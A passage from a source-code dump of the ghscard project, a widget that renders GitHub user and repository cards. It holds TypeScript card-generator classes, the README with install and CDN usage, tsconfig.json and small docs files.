HTMLElement {\n const url = this.getCardData(\"blog\");\n\n if (!url) {\n return null;\n }\n\n const blogLink = this.createAnchorElement(url, \"content\");\n blogLink.appendChild(this._doc.createTextNode(this.escapeHtml(url)));\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"linkify icon\"),\n blogLink,\n ]);\n }\n\n protected createEmailElement(className: string): HTMLElement {\n return super._createEmailElement(this.getCardData(\"email\"), className);\n }\n\n protected _createInfoList(displayMapping: object, size: UiSize = null): HTMLElement {\n if (size === null) {\n size = this.infoSize;\n }\n\n const itemClassName = \"item\";\n const infoList = this.createElement(\"div\", `ui ${size} list`);\n\n if (displayMapping[\"company\"]) {\n const 
element = this.createCompanyElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"location\"]) {\n const element = this.createLocationElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"email\"]) {\n const element = this.createEmailElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"blog\"]) {\n const element = this.createBlogElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"created_at\"]) {\n infoList.appendChild(\n this.createDateTimeElement(\"created_at\", \"Joined on\", \"wait icon\", itemClassName)\n );\n }\n\n if (displayMapping[\"updated_at\"]) {\n infoList.appendChild(\n this.createDateTimeElement(\n \"updated_at\",\n \"Updated at\",\n \"history icon\",\n itemClassName\n )\n );\n }\n\n if (infoList.children.length === 0) {\n infoList.appendChild(\n this.createDateTimeElement(\"created_at\", \"Joined on\", \"wait icon\", itemClassName)\n );\n }\n\n return infoList;\n }\n\n protected createUserInfoList(): HTMLElement {\n return this._createInfoList({\n company: true,\n location: true,\n email: true,\n blog: true,\n });\n }\n}\n" }, { "alpha_fraction": 0.5648329854011536, "alphanum_fraction": 0.5785854458808899, "avg_line_length": 28.715328216552734, "blob_id": "0c25ae65711dddee96bfe00fd8d5fc5104a4deb4", "content_id": "7f463f2571a8d675977d536ccf67f3310588727b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4072, "license_type": "permissive", "max_line_length": 195, "num_lines": 137, "path": "/README.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": ".. 
contents:: **ghscard**\n :backlinks: top\n :depth: 2\n\nSummary\n=========\n`ghscard <https://github.com/thombashi/ghscard>`__ is a JavaScript widget to generate interactive GitHub user/repository/organization cards for static web pages (like GitHub pages/Read the Docs).\n\n.. image:: https://badge.fury.io/py/ghscard.svg\n :target: https://badge.fury.io/py/ghscard\n :alt: PyPI package version\n\n.. image:: https://img.shields.io/pypi/pyversions/ghscard.svg\n :target: https://pypi.org/project/ghscard\n :alt: Supported Python versions\n\n.. image:: https://img.shields.io/npm/v/ghscard\n :target: https://www.npmjs.com/package/ghscard\n :alt: npm package version\n\n.. image:: https://img.shields.io/travis/thombashi/ghscard/master.svg?label=Linux%20CI\n :target: https://travis-ci.org/thombashi/ghscard\n :alt: Linux CI status\n\n.. image:: https://img.shields.io/github/stars/thombashi/ghscard.svg?style=social&label=Star\n :target: https://github.com/thombashi/ghscard\n :alt: GitHub stars\n\nDemo\n======\n- `Popular Repositories on GitHub <https://thombashi.github.io/ghscard/demo/>`__\n- https://thombashi.github.io/\n\nCLI Tool Installation\n====================================\nInstall ``ghscard`` CLI tool from `PyPI <//pypi.python.org/pypi>`__ via\n`pip <//pip.pypa.io/en/stable/installing/>`__ (Python package manager) command.\n\n::\n\n pip install ghscard\n\n\nDependencies\n====================================\n\nCLI Tool Dependencies\n----------------------\n- Python 3.5+\n- `Python package dependencies (automatically installed) <https://github.com/thombashi/ghscard/network/dependencies>`__\n\nQuick Start\n================\n\nGenerate card data files\n----------------------------------\nExecute ``ghscard gen`` command to generate a GitHub user/organization/repository card data file.\n\n::\n\n $ ghscard gen thombashi -o data\n [INFO] ghscard gen: written user data to 'data/thombashi.json'\n\n::\n\n $ ghscard gen Microsoft/TypeScript -o data\n [INFO] ghscard gen: 
written repository data to 'data/Microsoft_TypeScript.json'\n\n\nAdd widget to an HTML file\n----------------------------------\n\n:Example:\n .. code-block:: html\n\n <!doctype html>\n <html>\n <body>\n <table border=\"0\">\n <tr>\n <td>\n <div class='ghscard' src='data/thombashi.json'></div>\n </td>\n <td>\n <div class=\"ghscard\" src=\"data/Microsoft_TypeScript.json\"></div>\n </td>\n </tr>\n </table>\n\n <script src='//cdn.jsdelivr.net/gh/thombashi/ghscard@master/dist/ghscard.min.js'></script>\n </body>\n </html>\n\nThe above HTML rendered as follows:\n\n:Output:\n .. image:: ss/quickstart.png\n :width: 600px\n :alt: Click to navigate to the HTML page\n :target: //thombashi.github.io/ghscard/quickstart/\n\nCDN\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n- Version specific\n - ``https://cdn.jsdelivr.net/npm/ghscard@<version>/dist/ghscard.min.js``\n - e.g. https://cdn.jsdelivr.net/npm/[email protected]/dist/ghscard.min.js\n- Latest version\n - https://cdn.jsdelivr.net/gh/thombashi/ghscard@master/dist/ghscard.min.js\n\nFor more information\n----------------------\nMore examples are available at \nhttps://ghscard.rtfd.io/en/latest/pages/usage/index.html\n\nTested environment\n=======================\n\n.. table:: Tested Web Browsers\n\n ======================= ===========================\n Web browser Version\n ======================= ===========================\n ``Google Chrome`` ``57.0`` or newer\n ``Mozilla Firefox`` ``52.0`` or newer\n ======================= ===========================\n\nDocumentation\n---------------\nhttps://ghscard.rtfd.io/\n\nSponsors\n====================================\n.. 
image:: https://avatars0.githubusercontent.com/u/44389260?s=48&u=6da7176e51ae2654bcfd22564772ef8a3bb22318&v=4\n :target: https://github.com/chasbecker\n :alt: Charles Becker (chasbecker)\n\n`Become a sponsor <https://github.com/sponsors/thombashi>`__\n\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5012437701225281, "avg_line_length": 24.967741012573242, "blob_id": "5fa67475dd40d5047cff02b0dfdeecd147604e8b", "content_id": "4c488593cf52bc312171f3989405411e5126a8ce", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JSON with Comments", "length_bytes": 804, "license_type": "permissive", "max_line_length": 49, "num_lines": 31, "path": "/tsconfig.json", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "{\n \"compilerOptions\": {\n \"module\": \"commonjs\",\n \"moduleResolution\": \"node\",\n \"target\": \"ES5\",\n \"removeComments\": true,\n \"outDir\": \"./js\",\n \"sourceMap\": true,\n \"esModuleInterop\": true\n },\n \"exclude\": [\n \"node_modules\"\n ],\n \"files\": [\n \"src/card/base.ts\",\n \"src/card/interface.ts\",\n \"src/card/repository/base_repository.ts\",\n \"src/card/repository/medium.ts\",\n \"src/card/repository/small.ts\",\n \"src/card/repository/tiny.ts\",\n \"src/card/user/base_user.ts\",\n \"src/card/user/medium.ts\",\n \"src/card/user/small.ts\",\n \"src/card/user/tiny.ts\",\n \"src/emoji.ts\",\n \"src/factory.ts\",\n \"src/main.ts\",\n \"src/manager.ts\",\n \"src/types.ts\"\n ]\n}" }, { "alpha_fraction": 0.7956521511077881, "alphanum_fraction": 0.7956521511077881, "avg_line_length": 27.75, "blob_id": "9879a4317a7624150f3420332ff85813e22e9e28", "content_id": "7fd0290fdb2bbb7d8b20675200a46b4adc52a9a1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 230, "license_type": "permissive", "max_line_length": 54, "num_lines": 8, "path": "/ghscard/fetcher/__init__.py", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", 
"text": "\"\"\"\n.. codeauthor:: Tsuyoshi Hombashi <[email protected]>\n\"\"\"\n\nfrom ._base import AbstractCardDataFetcher\nfrom ._organization import OrganizationCardDataFetcher\nfrom ._repository import RepositoryCardDataFetcher\nfrom ._user import UserCardDataFetcher\n" }, { "alpha_fraction": 0.6895306706428528, "alphanum_fraction": 0.6895306706428528, "avg_line_length": 24.18181800842285, "blob_id": "fc626e8a9d5efe9b41c4b8f3c511289a0f23913f", "content_id": "16b783854b9e4c8205688821b1b176eeefdfa9c8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 277, "license_type": "permissive", "max_line_length": 79, "num_lines": 11, "path": "/docs/pages/links.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": ".. include:: sponsors.rst\n\n\n.. include:: genindex.rst\n\n\nLinks\n=====\n- `GitHub repository <https://github.com/thombashi/ghscard>`__\n- `Issue tracker <https://github.com/thombashi/ghscard/issues>`__\n- `pip: tool for installing python packages <https://pip.pypa.io/en/stable/>`__\n" }, { "alpha_fraction": 0.6236323714256287, "alphanum_fraction": 0.6236323714256287, "avg_line_length": 21.850000381469727, "blob_id": "d78f84b68369d7bcf0876a9f8b290d3b3c7735c2", "content_id": "0644186d466b64a75ad3bb5be09548348646b844", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 457, "license_type": "permissive", "max_line_length": 68, "num_lines": 20, "path": "/src/card/user/medium.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { UiSize } from \"../../types\";\nimport { AbstractUserCardGerator } from \"./base_user\";\n\nexport class MediumUserCardGerator extends AbstractUserCardGerator {\n protected get headerSize(): UiSize {\n return \"medium\";\n }\n\n protected get infoSize(): UiSize {\n return \"medium\";\n }\n\n protected get popupSize(): UiSize {\n return \"medium\";\n }\n\n 
protected get avatarColumnWide(): string {\n return \"nine\";\n }\n}\n" }, { "alpha_fraction": 0.5308219194412231, "alphanum_fraction": 0.6609588861465454, "avg_line_length": 40.71428680419922, "blob_id": "57c83434a1f94d971a5db3ecccc4733c0499ee32", "content_id": "7315f5b39f459692d37e96b89af3fde443380004", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 292, "license_type": "permissive", "max_line_length": 112, "num_lines": 7, "path": "/docs/pages/sponsors.rst", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "Sponsors\n====================================\n.. image:: https://avatars0.githubusercontent.com/u/44389260?s=48&u=6da7176e51ae2654bcfd22564772ef8a3bb22318&v=4\n :target: https://github.com/chasbecker\n :alt: Charles Becker (chasbecker)\n\n`Become a sponsor <https://github.com/sponsors/thombashi>`__\n" }, { "alpha_fraction": 0.5615799427032471, "alphanum_fraction": 0.5631213784217834, "avg_line_length": 31.196029663085938, "blob_id": "a4555a945ebac8a425d4e523da4567a05d95d93e", "content_id": "0a886f091abc85a2592e295b96c7f9ba96823b3e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 25950, "license_type": "permissive", "max_line_length": 100, "num_lines": 806, "path": "/src/card/repository/base_repository.ts", "repo_name": "thombashi/ghscard", "src_encoding": "UTF-8", "text": "import { AVATAR_ELEMENT_ID } from \"../../const\";\nimport { EmojiProcessorInterface } from \"../../emoji\";\nimport { ElementDisplay, UiColor, UiSize, RepoCardDataKey } from \"../../types\";\nimport { AbstractCardGerator } from \"../base\";\n\nimport dayjs from \"dayjs\";\n\nnamespace CanvasId {\n export const COMMITS_CHART = \"__commits_chart_canvas__\";\n export const ISSUES_CHART = \"__issues_chart_canvas__\";\n export const LANGUAGES_CHART = \"__language_chart_canvas__\";\n}\n\nexport class AbstractRepositoryCardGerator 
extends AbstractCardGerator {\n protected get versionLabelSize(): UiSize {\n throw Error(\"not implemented\");\n }\n\n protected get topicSize(): UiSize {\n throw Error(\"not implemented\");\n }\n\n protected get htmlUrl(): string {\n return this.getCardData(\"html_url\");\n }\n\n private get language(): string {\n return this.getCardData(\"language\");\n }\n\n protected get lineChartHeight(): number {\n throw Error(\"not implemented\");\n }\n\n protected get pieChartHeight(): number {\n throw Error(\"not implemented\");\n }\n\n protected get pieChartLegendFontSize(): number {\n throw Error(\"not implemented\");\n }\n\n protected get chartTitleFontSize(): number {\n throw Error(\"not implemented\");\n }\n\n protected get chartTickFontSize(): number {\n throw Error(\"not implemented\");\n }\n\n private get releaseTagColor(): UiColor {\n return \"blue\";\n }\n\n constructor(\n doc: Document,\n cardData: object,\n iframeWidth: number,\n color: string,\n protected chartDisplay: ElementDisplay,\n protected topicDisplay: ElementDisplay,\n emojiProcessor: EmojiProcessorInterface\n ) {\n super(doc, cardData, iframeWidth, color, emojiProcessor);\n\n this.colorMap = {\n a: \"red\",\n b: \"orange\",\n c: \"yellow\",\n d: \"olive\",\n e: \"green\",\n f: \"teal\",\n g: \"blue\",\n h: \"violet\",\n i: \"purple\",\n j: \"pink\",\n k: \"brown\",\n l: \"grey\",\n m: \"black\",\n n: \"red\",\n o: \"orange\",\n p: \"yellow\",\n q: \"olive\",\n r: \"green\",\n s: \"teal\",\n t: \"blue\",\n u: \"violet\",\n v: \"purple\",\n w: \"pink\",\n x: \"brown\",\n y: \"grey\",\n z: \"black\",\n };\n this.colorMap[\"C\"] = \"black\";\n this.colorMap[\"C++\"] = \"pink\";\n this.colorMap[\"Go\"] = \"teal\";\n this.colorMap[\"HTML\"] = \"red\";\n this.colorMap[\"Java\"] = \"brown\";\n this.colorMap[\"Swift\"] = \"orange\";\n this.colorMap[\"JavaScript\"] = \"yellow\";\n this.colorMap[\"Python\"] = \"blue\";\n this.colorMap[\"Ruby\"] = \"purple\";\n this.colorMap[\"Shell\"] = \"green\";\n }\n\n 
protected isDisplayChart(): boolean {\n if (this.chartDisplay === \"none\") {\n return false;\n }\n\n return true;\n }\n\n protected isDisplayCommitChart(): boolean {\n return this.isDisplayChart() && Number(this.getCardData(\"commits_last_year\")) > 0;\n }\n\n protected isDisplayTopic(): boolean {\n if (this.topicDisplay === \"none\") {\n return false;\n }\n\n if (this.getCardData(\"topics\") == null) {\n return false;\n }\n\n return this.getCardData(\"topics\").length > 0;\n }\n\n protected getScript(): string {\n const popupScript = [\n `$('#${AVATAR_ELEMENT_ID}.ui.image').popup({`,\n \"on: 'hover',\",\n \"inline: true,\",\n \"});\",\n ].join(\"\\n\");\n\n const scriptArray = [popupScript];\n\n if (this.isDisplayChart()) {\n scriptArray.push(\"$('.ui.accordion').accordion();\");\n scriptArray.push(this.getGlobalChartOption());\n scriptArray.push(this.createIssuesLabeChartScript());\n scriptArray.push(this.createLanguageLabeChartScript());\n\n if (this.isDisplayCommitChart()) {\n scriptArray.push(this.createCommitChartScript());\n }\n }\n\n return scriptArray.join(\"\\n\");\n }\n\n private getGlobalChartOption(): string {\n return \"Chart.defaults.global.defaultFontSize = 10;\";\n }\n\n private getPieChartOption(): object {\n return {\n responsive: false,\n legend: {\n position: \"right\",\n labels: {\n fontSize: this.pieChartLegendFontSize,\n },\n },\n };\n }\n\n private createIssuesLabeChartScript(): string {\n const issuesLabelArray = [];\n if (this.getCardData(\"has_issues\")) {\n for (const issueLabel of this.getCardData(\"open_issues\")[\"labels\"]) {\n issuesLabelArray.push(`'${issueLabel}'`);\n }\n }\n\n return `\nvar issuesCanvas = document.getElementById('${CanvasId.ISSUES_CHART}');\nif (issuesCanvas) {\n issuesCanvas.width = ${this.getChartWidth()};\n let myPieChart = new Chart(issuesCanvas, {\n type: 'pie',\n data: {\n labels: [${issuesLabelArray.join(\", \")}],\n datasets: [{\n data: [${this.getCardData(\"open_issues\")[\"data\"]}],\n 
backgroundColor: Please.make_color({\n colors_returned: ${this.getCardData(\"open_issues_count\")},\n }),\n }]\n },\n options: ${JSON.stringify(this.getPieChartOption())},\n });\n}`;\n }\n\n private createLanguageLabeChartScript(): string {\n const languageLabelArray = [];\n for (const languageLabel of this.getCardData(\"languages\")[\"labels\"]) {\n languageLabelArray.push(`'${languageLabel}'`);\n }\n\n return `\nvar languageCanvas = document.getElementById('${CanvasId.LANGUAGES_CHART}');\n\nif (languageCanvas) {\n languageCanvas.width = ${this.getChartWidth()};\n let myPieChart = new Chart(languageCanvas, {\n type: 'pie',\n data: {\n labels: [${languageLabelArray.join(\", \")}],\n datasets: [{\n data: [${this.getCardData(\"languages\")[\"data\"]}],\n backgroundColor: Please.make_color({\n colors_returned: ${this.getCardData(\"languages\")[\"labels\"].length},\n }),\n }]\n },\n options: ${JSON.stringify(this.getPieChartOption())},\n });\n}\n`;\n }\n\n private createCommitChartScript(): string {\n let fetchDate = dayjs(this.getCardData(\"fetched_at\"));\n const dateArray = [];\n\n for (let i = 0; i < 52; i++) {\n console.log(fetchDate.format(\"YYYY-MM-DD\"));\n dateArray.push(`moment('${fetchDate.format(\"YYYY-MM-DD\")}').toDate()`);\n fetchDate = fetchDate.subtract(1, \"week\");\n }\n dateArray.reverse();\n\n const script = `\nvar commitsCanvas = document.getElementById('${CanvasId.COMMITS_CHART}');\nif (commitsCanvas) {\n commitsCanvas.width = ${this.getChartWidth()};\n var commitsChart = new Chart(commitsCanvas, {\n type: 'line',\n data: {\n labels: [${dateArray.join(\", \")}],\n datasets: [{\n label: 'Commits',\n data: [${this.getCardData(\"participation\")}],\n fill: true,\n backgroundColor: 'rgba(136, 211, 161, 0.9)',\n borderWidth: 0,\n pointRadius: 0.5,\n pointHitRadius: 8,\n showLine: true,\n }]\n },\n options: {\n responsive: false,\n title: {\n display: true,\n fontSize: ${this.chartTitleFontSize},\n text: '${this.getCardData(\"commits_last_year\")} 
commits in the last year'\n },\n legend: { display: false },\n scales:{\n xAxes: [{\n type: 'time',\n time: { parser: 'MM/YYYY', tooltipFormat: 'YYYY wo [week]' },\n gridLines: { display: false },\n ticks: { minRotation: 25, fontSize: ${this.chartTickFontSize} },\n }],\n yAxes: [{\n ticks: { min: 0 },\n scaleLabel: { display: true, labelString: 'Commits' },\n }],\n },\n }\n });\n}`;\n return script;\n }\n\n protected createCardHeader(): HTMLElement {\n const header = this.createElement(\"div\", `ui dividing ${this.headerSize} header`);\n header.appendChild(this.createOwnerAvatar());\n header.appendChild(this.createPopup());\n\n let subheaderText = this.getCardData(\"owner_name\");\n if (subheaderText == null) {\n subheaderText = this.getCardData(\"organization\")[\"name\"];\n }\n if (subheaderText != null) {\n const subheader = this.createElement(\"div\", \"sub header\");\n subheader.appendChild(this._doc.createTextNode(subheaderText));\n\n header.appendChild(this.createContentElement([this.createRepositoryName(), subheader]));\n }\n\n const latestTag = this.getCardData(\"latest_tag\");\n if (typeof latestTag === \"string\" && latestTag) {\n header.appendChild(this.createTagLabel());\n }\n\n return header;\n }\n\n private getChartWidth(): number {\n const marginWidth = 32;\n const cardWidth = this.cardWidth;\n const chartWidth = cardWidth - marginWidth;\n\n return chartWidth > marginWidth ? 
chartWidth : cardWidth;\n }\n\n private getCardData(key: RepoCardDataKey): string {\n return this._cardData[key];\n }\n\n protected getColor(): UiColor {\n if (this.color != null) {\n return this.toUiColor(this.color);\n }\n\n const defaultColor: UiColor = \"grey\";\n if (this.language == null) {\n return defaultColor;\n }\n\n let color: UiColor = this.colorMap[this.language];\n if (typeof color !== \"undefined\") {\n return color;\n }\n\n color = this.colorMap[this.language.charAt(0).toLowerCase()];\n if (typeof color !== \"undefined\") {\n return color;\n }\n\n return defaultColor;\n }\n\n private getDescription(): string {\n const text = this.getCardData(\"description\");\n if (text == null) {\n return \"no description\";\n }\n\n return text;\n }\n\n protected createCardContent(): HTMLElement {\n const segmentClassName = \"ui vertical basic compact segment\";\n\n const childArray = [\n this.createCardHeader(),\n this.createElementWithChild(segmentClassName, [\n this.createDescription(this.getDescription()),\n ]),\n ];\n\n {\n const infoArray = [];\n\n const cardInfoList = this.createCardInfoList();\n if (cardInfoList) {\n infoArray.push(cardInfoList);\n }\n\n const detailInfoList = this.createDetailInfoList();\n if (detailInfoList) {\n infoArray.push(detailInfoList);\n }\n\n if (infoArray.length > 0) {\n childArray.push(this.createElementWithChild(segmentClassName, infoArray));\n }\n }\n\n if (this.isDisplayCommitChart()) {\n childArray.push(\n this.createElementWithChild(segmentClassName, [this.createCommitChart()])\n );\n }\n\n if (this.isDisplayTopic()) {\n const topicsLabelList = [];\n for (const labelText of this.getCardData(\"topics\")) {\n topicsLabelList.push(this.createTopicLabelElement(labelText, this.topicSize));\n }\n if (topicsLabelList.length > 0) {\n childArray.push(this.createElementWithChild(segmentClassName, topicsLabelList));\n }\n }\n\n return this.createContentElement(childArray);\n }\n\n private createCommitChart(): HTMLElement {\n const 
canvas = this._doc.createElement(\"canvas\");\n canvas.id = CanvasId.COMMITS_CHART;\n canvas.height = this.lineChartHeight;\n\n return canvas;\n }\n\n protected createExtraCardContent(): HTMLElement {\n const grid = this.createElement(\"div\", \"ui equal width center middle aligned grid\");\n\n const languageLabel = this.createLanguageLabel();\n if (languageLabel) {\n grid.appendChild(this.createColumn(languageLabel, \"six wide\"));\n }\n grid.appendChild(this.createColumn(this.createStars()));\n grid.appendChild(this.createColumn(this.createForks()));\n\n const extraContent = this.createElement(\"div\", \"extra content\");\n extraContent.appendChild(grid);\n\n return extraContent;\n }\n\n protected createPopupInfoList(): HTMLElement {\n const displayMapping = {\n subscribers_count: true,\n open_issues_count: true,\n branches_count: true,\n contributors_count: true,\n created_at: true,\n updated_at: true,\n };\n\n return this._createInfoList(displayMapping, this.popupSize);\n }\n\n protected createCardInfoList(): HTMLElement {\n const displayMapping = {\n repo_homepage: true,\n wiki: true,\n pulls_count: true,\n license: true,\n };\n\n if (!this.isDisplayChart()) {\n displayMapping[\"open_issues_count\"] = true;\n }\n\n return this._createInfoList(displayMapping, this.infoSize);\n }\n\n protected createDetailInfoList(): HTMLElement {\n if (!this.isDisplayChart()) {\n return null;\n }\n\n const accordion = this.createElement(\"div\", \"ui accordion\");\n\n if (this.getCardData(\"open_issues_count\")) {\n const title = this.createElementWithChild(\"title\", [\n this.createElement(\"i\", \"dropdown icon\"),\n this._doc.createTextNode(\"Open issues\"),\n this.createLabelElement(\n String(this.getCardData(\"open_issues_count\")),\n this.infoSize\n ),\n ]);\n accordion.appendChild(title);\n\n const canvas = this._doc.createElement(\"canvas\");\n canvas.id = CanvasId.ISSUES_CHART;\n canvas.height = this.pieChartHeight;\n\n 
accordion.appendChild(this.createContentElement([canvas]));\n }\n\n if (Number(this.getCardData(\"languages_count\")) > 1) {\n const title = this.createElementWithChild(\"title\", [\n this.createElement(\"i\", \"dropdown icon\"),\n this._doc.createTextNode(\"Languages\"),\n this.createLabelElement(String(this.getCardData(\"languages_count\")), this.infoSize),\n ]);\n accordion.appendChild(title);\n\n const canvas = this._doc.createElement(\"canvas\");\n canvas.id = CanvasId.LANGUAGES_CHART;\n canvas.height = this.pieChartHeight;\n\n accordion.appendChild(this.createContentElement([canvas]));\n }\n\n if (accordion.children.length === 0) {\n return null;\n }\n\n return accordion;\n }\n\n protected _createInfoList(displayMapping: object, size: UiSize = null): HTMLElement {\n if (size === null) {\n size = this.infoSize;\n }\n\n const itemClassName = \"item\";\n const infoList = this.createElement(\"div\", `ui ${size} list`);\n\n if (displayMapping[\"repo_homepage\"]) {\n const element = this.createHomepageElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"wiki\"]) {\n const element = this.createWikiElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (\n displayMapping[\"subscribers_count\"] &&\n Number(this.getCardData(\"subscribers_count\")) > 0\n ) {\n const element = this.createWatchersElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (\n displayMapping[\"open_issues_count\"] &&\n Number(this.getCardData(\"open_issues_count\")) > 0\n ) {\n const element = this.createIssuesElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"pulls_count\"] && Number(this.getCardData(\"pulls_count\")) > 0) {\n const element = this.createPullsElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"branches_count\"] && 
Number(this.getCardData(\"branches_count\")) > 0) {\n const element = this.createBranchElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (\n displayMapping[\"contributors_count\"] &&\n Number(this.getCardData(\"contributors_count\")) > 0\n ) {\n const element = this.createContributorsElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"license\"]) {\n const element = this.createLicenseElement(itemClassName);\n if (element) {\n infoList.appendChild(element);\n }\n }\n\n if (displayMapping[\"created_at\"]) {\n infoList.appendChild(\n this.createDateTimeElement(\"created_at\", \"Created at\", \"wait icon\", itemClassName)\n );\n }\n\n if (displayMapping[\"updated_at\"]) {\n infoList.appendChild(\n this.createDateTimeElement(\n \"updated_at\",\n \"Updated at\",\n \"history icon\",\n itemClassName\n )\n );\n }\n\n if (infoList.children.length === 0) {\n infoList.appendChild(\n this.createDateTimeElement(\"created_at\", \"Created at\", \"wait icon\", \"item\")\n );\n }\n\n return infoList;\n }\n\n private createTopicLabelElement(topic: string, size: UiSize): HTMLElement {\n const label = this.createAnchorElement(\n `//github.com/search?q=topic%3A${topic}&type=Repositories`,\n `ui blue horizontal basic ${size} label`\n );\n label.appendChild(this._doc.createTextNode(topic));\n label.title = `topic: ${topic}`;\n\n return label;\n }\n\n private createHomepageElement(className: string): HTMLElement {\n const homepageUrl: string = this.getCardData(\"repo_homepage\");\n\n if (homepageUrl == null) {\n console.debug(`homepage not found in ${this.htmlUrl}`);\n return null;\n }\n\n const linkElement = this.createAnchorElement(homepageUrl, \"content\");\n linkElement.title = \"Repository homepage\";\n linkElement.appendChild(this._doc.createTextNode(this.escapeHtml(linkElement.hostname)));\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"home icon\"),\n 
linkElement,\n ]);\n }\n\n private createWikiElement(className: string): HTMLElement {\n if (!this.getCardData(\"has_wiki\")) {\n console.debug(`wiki not found in ${this.htmlUrl}`);\n return null;\n }\n\n const linkElement = this.createAnchorElement(`${this.htmlUrl}/wiki`, \"content\");\n linkElement.title = \"Repository wiki\";\n linkElement.appendChild(this._doc.createTextNode(\"Wiki\"));\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"book icon\"),\n linkElement,\n ]);\n }\n\n private createWatchersElement(className: string): HTMLElement {\n const linkElement = this.createAnchorElement(`${this.htmlUrl}/watchers`, \"content\");\n linkElement.appendChild(this._doc.createTextNode(\"Watchers\"));\n linkElement.appendChild(\n this.createLabelElement(String(this.getCardData(\"subscribers_count\")), this.infoSize)\n );\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"unhide icon\"),\n linkElement,\n ]);\n }\n\n private createIssuesElement(className: string): HTMLElement {\n const linkElement = this.createAnchorElement(`${this.htmlUrl}/issues`, \"content\");\n linkElement.appendChild(this._doc.createTextNode(\"Issues\"));\n linkElement.appendChild(\n this.createLabelElement(String(this.getCardData(\"open_issues_count\")), this.infoSize)\n );\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"warning circle icon\"),\n linkElement,\n ]);\n }\n\n private createPullsElement(className: string): HTMLElement {\n const linkElement = this.createAnchorElement(`${this.htmlUrl}/pulls`, \"content\");\n linkElement.appendChild(this._doc.createTextNode(\"Pull requests\"));\n linkElement.appendChild(\n this.createLabelElement(String(this.getCardData(\"pulls_count\")), this.infoSize)\n );\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"sign in icon\"),\n linkElement,\n ]);\n }\n\n private createBranchElement(className: string): HTMLElement {\n const 
linkElement = this.createAnchorElement(`${this.htmlUrl}/branches`, \"content\");\n linkElement.appendChild(this._doc.createTextNode(\"Branches\"));\n linkElement.appendChild(\n this.createLabelElement(String(this.getCardData(\"branches_count\")), this.infoSize)\n );\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"fork icon\"),\n linkElement,\n ]);\n }\n\n private createContributorsElement(className: string): HTMLElement {\n const linkElement = this.createAnchorElement(\n `${this.htmlUrl}/graphs/contributors`,\n \"content\"\n );\n linkElement.appendChild(this._doc.createTextNode(\"Contributors\"));\n linkElement.appendChild(\n this.createLabelElement(String(this.getCardData(\"contributors_count\")), this.infoSize)\n );\n\n return this.createElementWithChild(className, [\n this.createElement(\"i\", \"users icon\"),\n linkElement,\n ]);\n }\n\n private createLicenseElement(className: string): HTMLElement {\n const licenseData = this.getCardData(\"license\");\n\n if (licenseData == null || licenseData[\"spdx_id\"] == null) {\n return null;\n }\n\n const licenseElement: HTMLElement = this.createElement(\"div\", className);\n licenseElement.appendChild(this.createElement(\"i\", \"law icon\"));\n licenseElement.appendChild(\n this.createContentElement([this._doc.createTextNode(licenseData[\"spdx_id\"])])\n );\n licenseElement.title = licenseData[\"name\"];\n\n return licenseElement;\n }\n\n private createRepositoryName(): HTMLElement {\n let repoLink: HTMLElement;\n if (this.htmlUrl) {\n repoLink = this.createAnchorElement(this.htmlUrl);\n } else {\n repoLink = this._doc.createElement(\"div\");\n }\n\n repoLink.appendChild(this._doc.createTextNode(this.getCardData(\"name\")));\n\n return repoLink;\n }\n\n private createOwnerAvatar(): HTMLElement {\n const avatar = this.createImageElement(this.getCardData(\"avatar_url\"), \"ui avatar image\");\n avatar.id = AVATAR_ELEMENT_ID;\n\n return avatar;\n }\n\n private createTagLabel(): HTMLElement 
